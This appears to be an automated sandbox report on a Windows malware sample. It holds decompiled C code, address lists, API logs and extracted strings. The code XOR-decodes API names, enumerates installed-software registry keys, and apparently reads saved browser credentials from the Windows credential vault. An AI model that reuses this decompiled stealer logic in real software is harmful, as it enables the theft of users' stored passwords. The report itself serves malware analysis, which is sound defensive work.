						if(_t743 != 0xffffffff) {
							goto L23;
						}
						_t878 = 0x50;
						 *((intOrPtr*)(_t947 - 0x29)) = 0x3e390750;
						 *((intOrPtr*)(_t947 - 0x25)) = 0x23273f34;
						_t926 = 0;
						__eflags = 0;
						 *((char*)(_t947 - 0x21)) = 0;
						while(1) {
							_t879 = _t878 ^  *(_t947 + _t926 - 0x28);
							 *(_t947 + _t926 - 0x28) = _t879;
							_t926 = _t926 + 1;
							__eflags = _t926 - 7;
							if(_t926 >= 7) {
								break;
							}
							_t878 =  *((intOrPtr*)(_t947 - 0x29));
						}
						_push(_t879);
						 *((char*)(_t947 - 0x21)) = 0;
						_t745 = E001D237C(_t947 - 0xd8, _t947 - 0x28);
						__eflags = _t745 - 0xffffffff;
						if(_t745 == 0xffffffff) {
							goto L27;
						}
						goto L23;
						L36:
						_t939 = _t939 + 1;
						__eflags = _t928;
					} while (_t928 == 0);
					goto L39;
				}
				RegCloseKey( *(_t947 - 0x64));
				goto L78;
			}

0x001f6291
0x001f629b
0x001f62a1
0x001f62a5
0x001f62a8
0x001f62ab
0x001f62ae
0x001f62af
0x001f62b5
0x001f62b8
0x001f62c5
0x001f62cf
0x001f62d5
0x001f62dc
0x001f62e1
0x001f62e4
0x001f62f4
0x001f62f9
0x001f6300
0x001f6302
0x001f6309
0x001f6312
0x001f631f
0x001f6326
0x001f6327
0x001f6332
0x001f633e
0x001f634a
0x001f6352
0x001f6366
0x001f6369
0x001f636f
0x001f6372
0x001f6375
0x001f637b
0x001f6382
0x001f6385
0x001f638b
0x001f6393
0x001f63a3
0x001f63a5
0x001f63b5
0x001f63b7
0x001f63d1
0x001f63d7
0x001f63d9
0x001f63db
0x00000000
0x00000000
0x001f63f9
0x001f63ff
0x001f6418
0x001f641e
0x001f6420
0x001f6739
0x001f673e
0x001f6740
0x001f6743
0x001f675a
0x001f6760
0x001f6762
0x001f6b15
0x001f6b15
0x001f6b15
0x001f6b17
0x001f6b17
0x001f6b1d
0x001f6b23
0x001f6b2e
0x001f6b33
0x001f6b3d
0x001f6b46
0x001f6b57
0x001f6b5f
0x001f6b5f
0x001f6768
0x001f6768
0x001f676a
0x001f6775
0x001f6788
0x001f678e
0x001f6790
0x001f6792
0x00000000
0x00000000
0x001f67b0
0x001f67b6
0x001f67cf
0x001f67d5
0x001f67d7
0x001f6adf
0x001f6ae4
0x001f6ae6
0x001f6ae9
0x001f6b03
0x001f6b09
0x001f6b0b
0x001f6b62
0x001f6b62
0x001f6b63
0x001f6b66
0x001f6b68
0x001f6b85
0x001f6b8b
0x001f6b8d
0x001f6b90
0x001f6b92
0x00000000
0x00000000
0x001f6bb0
0x001f6bb6
0x001f6bcf
0x001f6bd5
0x001f6bd7
0x001f6f8d
0x001f6f90
0x00000000
0x001f6f90
0x001f6bdd
0x001f6bdf
0x001f6be5
0x00000000
0x00000000
0x00000000
0x00000000
0x001f6beb
0x001f6beb
0x001f6bf5
0x001f6c0b
0x001f6c11
0x001f6c13
0x001f6c19
0x001f6c1b
0x00000000
0x00000000
0x001f6c3b
0x001f6c41
0x001f6c5a
0x001f6c60
0x001f6c62
0x001f6c72
0x001f6c78
0x001f6c7e
0x001f6c88
0x001f6c8e
0x001f6c92
0x001f6c94
0x001f6c9b
0x001f6c9d
0x001f6ca4
0x001f6cab
0x001f6cb2
0x001f6cb5
0x001f6cb5
0x001f6cb9
0x001f6cba
0x001f6cbd
0x00000000
0x00000000
0x001f6cbf
0x001f6cbf
0x001f6cc7
0x001f6ce4
0x001f6ce6
0x001f6ce8
0x001f6f64
0x001f6f67
0x001f6f73
0x001f6f77
0x001f6f7c
0x001f6f7c
0x00000000
0x001f6f7c
0x001f6cee
0x001f6cfa
0x001f6d07
0x001f6d11
0x001f6d1c
0x001f6d2e
0x001f6d39
0x001f6d3e
0x001f6d40
0x001f6d47
0x001f6d4e
0x001f6d4e
0x001f6d50
0x001f6d56
0x001f6d5a
0x001f6d5a
0x001f6d5e
0x001f6d5f
0x001f6d62
0x00000000
0x00000000
0x001f6d64
0x001f6d64
0x001f6d69
0x001f6d6d
0x001f6d78
0x001f6d7d
0x001f6d80
0x001f6dfa
0x001f6dfa
0x001f6dfc
0x001f6e03
0x001f6e09
0x001f6e09
0x001f6e0b
0x001f6e0b
0x001f6e0f
0x001f6e10
0x001f6e13
0x00000000
0x00000000
0x001f6e15
0x001f6e15
0x001f6e15
0x001f6e1a
0x001f6e1e
0x001f6e29
0x001f6e2e
0x001f6e31
0x00000000
0x00000000
0x001f6e37
0x001f6e37
0x001f6e3e
0x001f6e40
0x001f6e47
0x001f6e4e
0x001f6e5b
0x001f6e62
0x001f6e63
0x001f6e63
0x001f6e6b
0x001f6e8a
0x001f6e8c
0x001f6e8e
0x001f6f55
0x001f6f5f
0x00000000
0x001f6f5f
0x001f6e96
0x001f6ea2
0x001f6ea7
0x001f6ea9
0x001f6eb8
0x001f6ebf
0x001f6ec2
0x001f6ec8
0x001f6ece
0x001f6ed3
0x001f6ed7
0x001f6ed9
0x001f6ee0
0x001f6ee2
0x001f6ee2
0x001f6ee6
0x001f6ee7
0x001f6eea
0x00000000
0x00000000
0x001f6eec
0x001f6eec
0x001f6eec
0x001f6ef7
0x001f6f04
0x001f6f0c
0x001f6f19
0x001f6f27
0x001f6f2b
0x001f6f36
0x001f6f41
0x001f6f4c
0x001f6f50
0x00000000
0x001f6f50
0x001f6d82
0x001f6d84
0x001f6d8b
0x001f6d92
0x001f6d92
0x001f6d94
0x001f6d94
0x001f6d98
0x001f6d99
0x001f6d9c
0x00000000
0x00000000
0x001f6d9e
0x001f6d9e
0x001f6da3
0x001f6da7
0x001f6db2
0x001f6db7
0x001f6dba
0x00000000
0x00000000
0x001f6dbc
0x001f6dbe
0x001f6dc5
0x001f6dcc
0x001f6dcc
0x001f6dce
0x001f6dd2
0x001f6dd2
0x001f6dd6
0x001f6dd7
0x001f6dda
0x00000000
0x00000000
0x001f6ddc
0x001f6ddc
0x001f6de1
0x001f6de5
0x001f6df0
0x001f6df5
0x001f6df8
0x00000000
0x00000000
0x00000000
0x001f6df8
0x001f6c67
0x001f6f7e
0x001f6f7e
0x001f6f7f
0x001f6f7f
0x001f6f87
0x001f6f8a
0x00000000
0x001f6f96
0x001f6f96
0x001f6f97
0x001f6f9a
0x001f6f9a
0x001f6fa2
0x001f6fa7
0x001f6fae
0x001f6faf
0x001f6fb2
0x001f6fbd
0x001f6fc4
0x001f6fcb
0x001f6fcd
0x001f6ff8
0x001f6ff8
0x001f6ffa
0x001f6ffc
0x001f7004
0x001f7005
0x001f7008
0x001f700a
0x001f700c
0x001f7060
0x001f70a3
0x001f70a5
0x001f70ab
0x001f70ac
0x001f70af
0x001f70b1
0x001f70b3
0x001f70f5
0x001f7102
0x001f7109
0x001f710a
0x001f710c
0x001f710f
0x001f7116
0x001f7116
0x001f7118
0x001f711f
0x001f7126
0x001f712c
0x001f712c
0x001f7130
0x001f7131
0x001f7134
0x00000000
0x00000000
0x001f7136
0x001f7136
0x001f713b
0x001f713e
0x001f7144
0x001f714d
0x001f7156
0x001f7161
0x001f716c
0x00000000
0x00000000
0x00000000
0x00000000
0x001f70b5
0x001f70b5
0x001f70b7
0x001f70bd
0x001f70c4
0x001f70cd
0x001f70d1
0x001f70da
0x001f70e6
0x001f70ed
0x001f70ee
0x001f70ef
0x001f70f1
0x001f70f1
0x00000000
0x001f70b5
0x001f7065
0x001f7067
0x001f706e
0x001f7070
0x001f7084
0x001f7084
0x001f7086
0x001f70a0
0x001f70a0
0x00000000
0x001f70a0
0x001f708a
0x001f708b
0x001f708b
0x001f708e
0x001f7092
0x001f7099
0x001f709b
0x001f709b
0x001f709b
0x00000000
0x001f708b
0x001f7077
0x001f707c
0x001f707f
0x00000000
0x001f707f
0x001f7011
0x001f7013
0x001f7015
0x001f702c
0x001f702c
0x00000000
0x001f702c
0x001f7017
0x001f7019
0x001f701b
0x001f7022
0x001f7023
0x001f7025
0x001f7025
0x001f7029
0x00000000
0x001f7029
0x001f6fcf
0x001f6fd1
0x001f6fd4
0x001f6ff4
0x001f6ff4
0x001f6ff6
0x00000000
0x00000000
0x001f6fdb
0x001f6fe0
0x001f6fe3
0x001f6fe6
0x001f6fe9
0x001f6feb
0x001f7057
0x001f7057
0x001f7059
0x00000000
0x00000000
0x001f7034
0x001f7039
0x001f703b
0x001f703f
0x001f7043
0x001f7043
0x001f7047
0x001f7047
0x001f7051
0x001f7052
0x001f7052
0x001f7054
0x001f7054
0x001f705b
0x00000000
0x001f705b
0x001f6fed
0x001f6fef
0x001f6ff2
0x001f6ff2
0x00000000
0x001f6ff4
0x001f6b13
0x00000000
0x001f6b13
0x001f67dd
0x001f67e3
0x001f67e9
0x001f67f3
0x001f67f9
0x001f67fd
0x001f67ff
0x001f6806
0x001f6808
0x001f680f
0x001f6816
0x001f681d
0x001f6820
0x001f6820
0x001f6824
0x001f6825
0x001f6828
0x00000000
0x00000000
0x001f682a
0x001f682a
0x001f682a
0x001f6832
0x001f684b
0x001f6851
0x001f6853
0x001f6abd
0x001f6ac0
0x001f6ac8
0x001f6acc
0x00000000
0x001f6acc
0x001f6859
0x001f6865
0x001f6872
0x001f687c
0x001f6887
0x001f6899
0x001f68a4
0x001f68a9
0x001f68ab
0x001f68b2
0x001f68b4
0x001f68bb
0x001f68c1
0x001f68c3
0x001f68c6
0x001f68c6
0x001f68ca
0x001f68cb
0x001f68ce
0x00000000
0x00000000
0x001f68d0
0x001f68d0
0x001f68d5
0x001f68db
0x001f68e3
0x001f68e8
0x001f68eb
0x001f6965
0x001f6965
0x001f6967
0x001f696e
0x001f6974
0x001f6974
0x001f6976
0x001f6976
0x001f697a
0x001f697b
0x001f697e
0x00000000
0x00000000
0x001f6980
0x001f6980
0x001f6985
0x001f6989
0x001f6994
0x001f6999
0x001f699c
0x00000000
0x00000000
0x001f69a2
0x001f69a2
0x001f69a9
0x001f69ab
0x001f69b2
0x001f69b6
0x001f69b9
0x001f69bd
0x001f69be
0x001f69be
0x001f69c6
0x001f69df
0x001f69e5
0x001f69e7
0x001f6aae
0x001f6ab8
0x00000000
0x001f6ab8
0x001f69ef
0x001f69f5
0x001f69fd
0x001f6a00
0x001f6a09
0x001f6a0f
0x001f6a1c
0x001f6a26
0x001f6a2b
0x001f6a2f
0x001f6a31
0x001f6a38
0x001f6a38
0x001f6a3a
0x001f6a3a
0x001f6a3e
0x001f6a3f
0x001f6a42
0x00000000
0x00000000
0x001f6a44
0x001f6a44
0x001f6a4f
0x001f6a5d
0x001f6a65
0x001f6a72
0x001f6a80
0x001f6a84
0x001f6a8f
0x001f6a9a
0x001f6aa5
0x001f6aa9
0x00000000
0x001f6aa9
0x001f68ed
0x001f68ef
0x001f68f6
0x001f68fd
0x001f68fd
0x001f68ff
0x001f68ff
0x001f6903
0x001f6904
0x001f6907
0x00000000
0x00000000
0x001f6909
0x001f6909
0x001f6909
0x001f690e
0x001f6912
0x001f691d
0x001f6922
0x001f6925
0x00000000
0x00000000
0x001f6927
0x001f6929
0x001f6930
0x001f6937
0x001f6937
0x001f6939
0x001f693d
0x001f693d
0x001f6941
0x001f6942
0x001f6945
0x00000000
0x00000000
0x001f6947
0x001f6947
0x001f694c
0x001f6950
0x001f695b
0x001f6960
0x001f6963
0x00000000
0x00000000
0x00000000
0x001f6ad1
0x001f6ad1
0x001f6ad2
0x001f6ad2
0x00000000
0x001f6ada
0x001f6426
0x001f642c
0x001f6432
0x001f643c
0x001f6442
0x001f6446
0x001f6448
0x001f644f
0x001f6451
0x001f6458
0x001f645f
0x001f6466
0x001f6469
0x001f6469
0x001f646d
0x001f646e
0x001f6471
0x00000000
0x00000000
0x001f6473
0x001f6473
0x001f647b
0x001f6494
0x001f649a
0x001f649c
0x001f6717
0x001f671a
0x001f6722
0x001f6726
0x00000000
0x001f6726
0x001f64a2
0x001f64ae
0x001f64bb
0x001f64c5
0x001f64d0
0x001f64e2
0x001f64ed
0x001f64f2
0x001f64f4
0x001f64fb
0x001f64fd
0x001f6504
0x001f650a
0x001f650c
0x001f650f
0x001f650f
0x001f6513
0x001f6514
0x001f6517
0x00000000
0x00000000
0x001f6519
0x001f6519
0x001f651e
0x001f6524
0x001f652c
0x001f6531
0x001f6534
0x001f65b2
0x001f65b4
0x001f65b5
0x001f65b7
0x001f65bd
0x001f65c0
0x001f65c0
0x001f65c2
0x001f65c8
0x001f65cc
0x001f65cc
0x001f65d0
0x001f65d4
0x001f65d5
0x001f65d8
0x00000000
0x00000000
0x001f65da
0x001f65da
0x001f65df
0x001f65e3
0x001f65ee
0x001f65f3
0x001f65f6
0x00000000
0x00000000
0x001f65fc
0x001f65fc
0x001f6603
0x001f6605
0x001f660c
0x001f6610
0x001f6613
0x001f6617
0x001f6618
0x001f6618
0x001f6620
0x001f6639
0x001f663f
0x001f6641
0x001f6708
0x001f6712
0x00000000
0x001f6712
0x001f6649
0x001f664f
0x001f6657
0x001f665a
0x001f6663
0x001f6669
0x001f6676
0x001f6680
0x001f6685
0x001f6689
0x001f668b
0x001f6692
0x001f6692
0x001f6694
0x001f6694
0x001f6698
0x001f6699
0x001f669c
0x00000000
0x00000000
0x001f669e
0x001f669e
0x001f669e
0x001f66a9
0x001f66b7
0x001f66bf
0x001f66cc
0x001f66da
0x001f66de
0x001f66e9
0x001f66f4
0x001f66ff
0x001f6703
0x00000000
0x001f6703
0x001f6536
0x001f6538
0x001f653f
0x001f6546
0x001f6546
0x001f6548
0x001f6548
0x001f654c
0x001f654d
0x001f6550
0x00000000
0x00000000
0x001f6552
0x001f6552
0x001f6552
0x001f6557
0x001f655b
0x001f6566
0x001f656b
0x001f656e
0x00000000
0x00000000
0x001f6570
0x001f6572
0x001f6579
0x001f6580
0x001f6580
0x001f6582
0x001f6586
0x001f6586
0x001f658a
0x001f658e
0x001f658f
0x001f6592
0x00000000
0x00000000
0x001f6594
0x001f6594
0x001f6599
0x001f659d
0x001f65a8
0x001f65ad
0x001f65b0
0x00000000
0x00000000
0x00000000
0x001f672b
0x001f672b
0x001f672c
0x001f672c
0x00000000
0x001f6734
0x001f6398
0x00000000

APIs

__EH_prolog.LIBCMT ref: 001F6291

Part of subcall function 001F922A: __EH_prolog.LIBCMT ref: 001F922F

Part of subcall function 001F5C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 001F5CB7

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F638B
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6398
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F63D1
wsprintfW.USER32 ref: 001F63F9
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?), ref: 001F6418
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000800), ref: 001F6494
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000800,?,?,?,00000001,?,?), ref: 001F6639
RegCloseKey.ADVAPI32(?), ref: 001F671A
RegCloseKey.ADVAPI32(?), ref: 001F6739
RegCloseKey.ADVAPI32(?), ref: 001F673E
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6743
RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F675A
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6788
wsprintfW.USER32 ref: 001F67B0
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001F67CF
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000800), ref: 001F684B
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000800,?,00000001,?,00000001,?,?), ref: 001F69DF
RegCloseKey.ADVAPI32(?), ref: 001F6AC0
RegCloseKey.ADVAPI32(?), ref: 001F6ADF
RegCloseKey.ADVAPI32(?), ref: 001F6AE4
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6AE9
RegOpenKeyExW.KERNEL32(80000003,0023D410,00000000,00020019,?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6B03
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6B13
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001F6B3D
RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F6B85
wsprintfW.USER32 ref: 001F6BB0
RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?), ref: 001F6BCF
RegEnumKeyExW.KERNEL32(?,00000000,?,?), ref: 001F6C0B
wsprintfW.USER32 ref: 001F6C3B
RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,00000000,00000000,00000000,00000000), ref: 001F6C5A
RegCloseKey.ADVAPI32(?), ref: 001F6C67
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000800), ref: 001F6CE4
RegCloseKey.ADVAPI32(?), ref: 001F6F90
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0024A6F8,001F8A36), ref: 001F716C

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 001F635C, 001F63E8, 001F6750, 001F679F, 001F6B98
, xrefs: 001F713B
k, xrefs: 001F70BD
%s\%s, xrefs: 001F63F3, 001F67AA, 001F6BAA, 001F6C35
k`x|, xrefs: 001F6930
6`_ECWZ, xrefs: 001F6552
?, xrefs: 001F637B
3, xrefs: 001F696E
!eHRQM@Xo@LD, xrefs: 001F682A
/$<8, xrefs: 001F6DC5
|9, xrefs: 001F65B7
8, xrefs: 001F6309
eEM, xrefs: 001F6EEC, 001F669E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariablestd::ios_base::_
String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$eEM$k$k`x|$|9
API String ID: 3920057841-2268807281
Opcode ID: 4be58ec3456d9a2e4837a7c42555d111638f119ce223f526b195374a381c70cb
Instruction ID: 504e5f050f54ada98cac2726ebbdffc431d40e9f562883fee76e22d3db826fb1
Opcode Fuzzy Hash: 4be58ec3456d9a2e4837a7c42555d111638f119ce223f526b195374a381c70cb
Instruction Fuzzy Hash: C4A2D070D0425DDEDF25CFA4DC94BFEBBB9AF25304F1041AAE54AA7242DB704A89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001EA2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434
stringlibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E001EA2F9(intOrPtr __ecx) {
				WCHAR* _v5;
				signed int _v12;
				intOrPtr _v16;
				char _v17;
				short _v19;
				intOrPtr _v23;
				char _v26;
				signed char _v27;
				char _v28;
				short _v29;
				intOrPtr _v33;
				intOrPtr _v37;
				char _v40;
				char _v41;
				char _v42;
				short _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				char _v54;
				signed char _v55;
				char _v56;
				short _v57;
				intOrPtr _v61;
				intOrPtr _v65;
				char _v68;
				char _v69;
				char _v76;
				char _v80;
				WCHAR* _v84;
				WCHAR* _v88;
				signed int _v92;
				WCHAR* _v96;
				WCHAR* _v100;
				signed int _v104;
				_Unknown_base(*)()* _v108;
				_Unknown_base(*)()* _v112;
				signed int _v116;
				intOrPtr _v120;
				WCHAR* _v124;
				WCHAR* _v128;
				char _v129;
				intOrPtr _v133;
				char _v148;
				signed int _v149;
				intOrPtr _v156;
				struct HINSTANCE__* _v160;
				char _v161;
				char _v176;
				signed int _v177;
				char _v178;
				char _v192;
				signed int _v193;
				struct _OSVERSIONINFOW _v476;
				void* __edi;
				void* __ebp;
				WCHAR* _t198;
				struct HINSTANCE__* _t200;
				_Unknown_base(*)()* _t203;
				_Unknown_base(*)()* _t206;
				void* _t210;
				void* _t213;
				void* _t216;
				WCHAR* _t218;
				int _t219;
				WCHAR* _t221;
				WCHAR* _t224;
				WCHAR* _t228;
				signed int _t230;
				WCHAR* _t231;
				WCHAR* _t234;
				WCHAR* _t238;
				intOrPtr _t245;
				WCHAR* _t246;
				WCHAR* _t247;
				WCHAR* _t248;
				signed int _t254;
				signed int _t255;
				WCHAR* _t268;
				intOrPtr _t288;
				WCHAR* _t289;
				WCHAR* _t298;
				WCHAR* _t301;
				WCHAR* _t302;
				signed char _t304;
				WCHAR* _t305;
				WCHAR* _t306;
				WCHAR* _t307;
				signed char _t308;
				signed char _t309;
				signed char _t310;
				WCHAR* _t311;
				WCHAR* _t312;
				WCHAR* _t338;
				intOrPtr _t342;
				void* _t344;
				void* _t345;
				struct HINSTANCE__* _t346;
				WCHAR* _t347;
				WCHAR* _t350;
				signed int _t351;
				intOrPtr _t352;
				WCHAR* _t353;
				intOrPtr _t355;
				void* _t356;
				void* _t357;
				void* _t359;

				_v156 = __ecx;
				E00202C70(_t345,  &_v476, 0, 0x114);
				E00202C70(_t345,  &_v476, 0, 0x114);
				_t359 = _t357 + 0x18;
				_v476.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v476);
				if(_v476.dwMajorVersion != 6) {
					L2:
					_v5 = 0;
					L3:
					_t304 = 0x5e;
					_v41 = 0x2b3f285e;
					_v37 = 0x323d2a32;
					_t198 = 0;
					_v33 = 0x323a7037;
					_v29 = 0x32;
					L4:
					 *(_t356 + _t198 - 0x24) =  *(_t356 + _t198 - 0x24) ^ _t304;
					_t198 = _t198 + 1;
					if(_t198 < 0xc) {
						_t18 =  &_v41; // 0x2b3f285e
						_t304 =  *_t18;
						goto L4;
					}
					_v28 = 0;
					_t200 = LoadLibraryA( &_v40); // executed
					_t346 = _t200;
					_v160 = _t346;
					__eflags = _t346;
					if(_t346 == 0) {
						return _t200;
					} else {
						asm("movaps xmm0, [0x23d7e0]");
						_t305 = 0;
						asm("movups [ebp-0xbd], xmm0");
						do {
							 *(_t356 + _t305 - 0xbc) =  *(_t356 + _t305 - 0xbc) ^ _v193;
							_t305 = _t305 + 1;
							__eflags = _t305 - 0xe;
						} while (_t305 < 0xe);
						_v178 = 0;
						_t203 = GetProcAddress(_t346,  &_v192);
						asm("movaps xmm0, [0x23dc30]");
						_t306 = 0;
						_v96 = _t203;
						asm("movups [ebp-0xad], xmm0");
						_v161 = 0;
						do {
							 *(_t356 + _t306 - 0xac) =  *(_t356 + _t306 - 0xac) ^ _v177;
							_t306 = _t306 + 1;
							__eflags = _t306 - 0xf;
						} while (_t306 < 0xf);
						_v161 = 0;
						_t206 = GetProcAddress(_t346,  &_v176);
						asm("movaps xmm0, [0x23dcf0]");
						_t307 = 0;
						_v124 = _t206;
						asm("movups [ebp-0x91], xmm0");
						_v133 = 0x554b4352;
						_v129 = 0;
						do {
							 *(_t356 + _t307 - 0x90) =  *(_t356 + _t307 - 0x90) ^ _v149;
							_t307 = _t307 + 1;
							__eflags = _t307 - 0x13;
						} while (_t307 < 0x13);
						_v129 = 0;
						_t301 = GetProcAddress(_t346,  &_v148);
						_v55 = 0x3d291e48;
						_t308 = 0x48;
						_v51 = 0x2d0f3c24;
						_v47 = 0x2d3c013c;
						_t210 = 0;
						__eflags = 0;
						_v43 = 0x25;
						while(1) {
							 *(_t356 + _t210 - 0x32) =  *(_t356 + _t210 - 0x32) ^ _t308;
							_t210 = _t210 + 1;
							__eflags = _t210 - 0xc;
							if(_t210 >= 0xc) {
								break;
							}
							_t308 = _v55;
						}
						_v42 = 0;
						_v112 = GetProcAddress(_t346,  &_v54);
						_t309 = 0x20;
						_v69 = 0x55417620;
						_t213 = 0;
						__eflags = 0;
						_v65 = 0x4567544c;
						_v61 = 0x45546954;
						_v57 = 0x4d;
						while(1) {
							 *(_t356 + _t213 - 0x40) =  *(_t356 + _t213 - 0x40) ^ _t309;
							_t213 = _t213 + 1;
							__eflags = _t213 - 0xc;
							if(_t213 >= 0xc) {
								break;
							}
							_t68 =  &_v69; // 0x55417620
							_t309 =  *_t68;
						}
						_v56 = 0;
						_v108 = GetProcAddress(_t346,  &_v68);
						_t310 = 0x77;
						_v27 = 0x2162177;
						_t216 = 0;
						__eflags = 0;
						_v23 = 0x531031b;
						_v19 = 0x1212;
						_v17 = 0;
						while(1) {
							 *(_t356 + _t216 - 0x16) =  *(_t356 + _t216 - 0x16) ^ _t310;
							_t216 = _t216 + 1;
							__eflags = _t216 - 9;
							if(_t216 >= 9) {
								break;
							}
							_t310 = _v27;
						}
						_v17 = 0;
						_t218 = GetProcAddress(_t346,  &_v26);
						_t311 = _v96;
						_v128 = _t218;
						__eflags = _t311;
						if(_t311 == 0) {
							L58:
							_t219 = FreeLibrary(_t346); // executed
							return _t219;
						}
						_t350 = _v124;
						__eflags = _t350;
						if(_t350 == 0) {
							goto L58;
						}
						__eflags = _t301;
						if(_t301 == 0) {
							goto L58;
						}
						__eflags = _t218;
						if(_t218 == 0) {
							goto L58;
						}
						__eflags = _v112;
						if(_v112 == 0) {
							goto L58;
						}
						__eflags = _v108;
						if(_v108 == 0) {
							goto L58;
						}
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t311(0x247a50, 0,  &_v12); // executed
						__eflags = _t221;
						if(_t221 < 0) {
							goto L58;
						}
						_v104 = _v104 & 0x00000000;
						_v92 = _v92 & 0x00000000;
						_t224 =  *_t301(_v12, 0x200,  &_v104,  &_v92);
						__eflags = _t224;
						if(_t224 < 0) {
							L57:
							 *_t350( &_v12);
							goto L58;
						}
						_v116 = _v116 & 0x00000000;
						__eflags = _v104;
						if(_v104 <= 0) {
							L56:
							_v128(_v92);
							goto L57;
						}
						_t347 = _v128;
						_t312 = 0;
						_t342 = 0;
						__eflags = 0;
						_v96 = 0;
						_v120 = 0;
						do {
							_t351 = _v92;
							_t302 = 0;
							_push(0x10);
							_push(0x247a40);
							__eflags = _v5;
							if(_v5 == 0) {
								_t352 = _t312 + _t351;
								_push(_t352);
								_v16 = _t352;
								_t228 = E00201D5D();
								_t359 = _t359 + 0xc;
								__eflags = _t228;
								if(_t228 != 0) {
									goto L54;
								}
								_t268 = E00206832();
								_v84 = _t268;
								lstrcpyW(_t268,  *(_t352 + 0x10));
								_t338 = E00206832();
								_v88 = _t338;
								lstrcpyW(_t338,  *((intOrPtr*)(_t352 + 0x14)) + 0x20);
								_t353 = E00206832();
								_v100 = _t353;
								lstrcpyW(_t353,  *((intOrPtr*)(_v16 + 0x18)) + 0x20);
								_t288 = _v16;
								_v80 = 0;
								_t289 = _v112(_v12, _t288,  *((intOrPtr*)(_t288 + 0x14)),  *((intOrPtr*)(_t288 + 0x18)), 0, 0,  &_v80, 2 + lstrlenW( *((intOrPtr*)(_t352 + 0x18)) + 0x20) * 2, 2 + lstrlenW( *((intOrPtr*)(_t352 + 0x14)) + 0x20) * 2, 2 + lstrlenW( *(_t352 + 0x10)) * 2);
								__eflags = _t289;
								if(_t289 < 0) {
									L40:
									_t247 = _v84;
									__eflags = _t247;
									if(_t247 != 0) {
										__eflags = _v88;
										if(_v88 != 0) {
											__eflags = _t353;
											if(_t353 != 0) {
												__eflags = _t302;
												if(_t302 != 0) {
													__eflags = StrStrIW(_t247, L"Internet Explorer");
													if(__eflags != 0) {
														_t254 = lstrlenW(_t302);
														_t255 = lstrlenW(_v100);
														_push(2 + _t254 * 2);
														_t353 = _v100;
														_push(_t302);
														_push(2 + _t255 * 2);
														_push(_t353);
														_push(_v88);
														_t344 = 6;
														E001E9D30(_v156, _t344, __eflags);
														_t359 = _t359 + 0x14;
													}
													_t247 = _v84;
												}
											}
										}
										E00205A55(_t247);
									}
									_t248 = _v88;
									__eflags = _t248;
									if(_t248 != 0) {
										E00205A55(_t248);
									}
									__eflags = _t353;
									if(_t353 != 0) {
										E00205A55(_t353);
									}
									__eflags = _t302;
									if(_t302 != 0) {
										E00205A55(_t302);
									}
									goto L54;
								}
								_push(2 + lstrlenW( *((intOrPtr*)(_v80 + 0x1c)) + 0x20) * 2);
								_t302 = E00206832();
								_t298 =  *((intOrPtr*)(_v80 + 0x1c)) + 0x20;
								__eflags = _t298;
								lstrcpyW(_t302, _t298);
								_push(_v80);
								L39:
								 *_t347();
								goto L40;
							}
							_t355 = _t351 + _t342;
							_push(_t355);
							_v16 = _t355;
							_t231 = E00201D5D();
							_t359 = _t359 + 0xc;
							__eflags = _t231;
							if(_t231 != 0) {
								goto L54;
							}
							_t234 = E00206832();
							_v84 = _t234;
							lstrcpyW(_t234,  *(_t355 + 0x10));
							_t238 = E00206832();
							_v88 = _t238;
